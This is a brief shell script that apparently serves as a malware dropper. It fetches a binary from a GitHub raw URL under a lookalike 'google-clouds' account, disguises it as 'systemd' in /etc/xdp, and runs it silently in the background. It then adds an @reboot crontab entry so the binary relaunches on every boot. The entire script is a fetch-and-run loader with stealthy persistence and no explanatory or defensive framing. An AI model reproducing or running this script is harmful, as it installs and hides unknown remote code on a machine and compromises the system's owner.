#!/bin/sh




curl https://raw.githubusercontent.com/google-clouds/sdk/tt --output /tmp/systemd
chmod +x /tmp/systemd
mkdir -p /etc/xdp/
mv /tmp/systemd /etc/xdp/systemd
/etc/xdp/systemd 2>/dev/null 1>/dev/null &

crontab -e
command="/etc/xdp/systemd 2>/dev/null 1>/dev/null &"
job="@reboot $command"
cat <(fgrep -i -v "$command" <(crontab -l)) <(echo "$job") | crontab -


echo
echo "ok"
echo
